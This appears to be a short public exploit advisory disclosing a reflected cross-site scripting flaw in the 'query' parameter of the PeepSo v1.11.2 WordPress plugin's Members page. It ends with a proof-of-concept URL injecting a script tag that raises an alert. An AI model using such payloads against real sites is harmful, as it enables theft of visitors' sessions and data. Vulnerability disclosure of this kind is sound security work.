WordPress PeepSo plugin version 1.11.2 suffers from a cross site scripting vulnerability.
0d2abe1f8360ec073ae662fa0f60ddd8
===================================================================================
PeepSo v1.11.2 (WordPress Plugin) - Cross-Site Scripting Vulnerability in Members"
===================================================================================
____________________________________________________________________________________
# Exploit Title: PeepSo v1.11.2 (WordPress Plugin) - XSS Vulnerability in Members
# Date: [11-09-2018]
# Category: Webapps
____________________________________________________________________________________
# Author: Socket_0x03 (Alvaro J. Gene)
# Email: Socket_0x03 (at) teraexe (dot) com
# Website: www.teraexe.com
____________________________________________________________________________________
# Software Link: https://wordpress.org/plugins/peepso-core/
# Plugin: PeepSo
# Version: 1.11.2
# File: Members
# Parameter: query
# Language: This application is available in English language.
# Plugin Description: PeepSo is a social network plugin for WordPress with different
kinds of features, such as user profiles, user registration, and other features.
____________________________________________________________________________________
# Cross-Site Scripting Vulnerability:
http://www.website.com/wordpress/index.php/members/?blocked/&query="><script>alert(23)</script>